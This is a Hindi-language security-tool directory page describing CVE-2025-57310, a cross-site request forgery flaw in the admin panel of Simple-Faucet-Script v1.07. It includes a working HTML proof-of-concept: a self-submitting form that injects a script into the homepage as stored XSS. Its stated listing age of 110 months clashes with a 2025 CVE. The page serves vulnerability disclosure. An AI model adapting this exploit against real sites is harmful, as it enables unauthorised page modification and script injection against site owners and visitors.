Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57310 — Salmen2/Simple-Faucet-Script v1.07 में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता, जो admin.php?p=ads&c=1 पर क्राफ्टेड POST अनुरोध के माध्यम से हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/mmakingdom/cve-2025-57310
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmmakingdom/cve-2025-57310

CVE-2025-57310

Salmen2/Simple-Faucet-Script v1.07 में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता, जो admin.php?p=ads&c=1 पर क्राफ्टेड POST अनुरोध के माध्यम से हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है।

रिपॉजिटरी देखें
110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-57310

Salmen2/Simple-Faucet-Script v1.07 में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता, जो admin.php?p=ads&c=1 पर क्राफ्टेड POST अनुरोध के माध्यम से हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है।

CWE

CWE-352: Cross-Site Request Forgery (CSRF)

CVSS v3.1 बेस स्कोर: 8.8 (उच्च)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

सारांश

उत्पाद एडमिन पैनल पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) के प्रति संवेदनशील है। जब कोई प्रमाणित एडमिन PoC वाले दुर्भावनापूर्ण पेज पर जाता है, तो CSRF हमला होमपेज सामग्री के अनधिकृत संशोधन का कारण बनता है।

पुनरुत्पादन के चरण

  1. https://example.com/admin.php पर एक व्यवस्थापक के रूप में लॉगिन करें
  2. निम्नलिखित PoC खोलें, होमपेज पर एक अलर्ट पॉपअप देखें (स्टोर्ड XSS)।
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

प्रभाव

एक हमलावर spacetop पैरामीटर के माध्यम से होमपेज में मनमाना HTML/JavaScript इंजेक्ट कर सकता है, जिससे स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) होती है।

श्रेय

Muntadhar M. Ahmed (almuntadhar0x01)

टूल डाउनलोड करें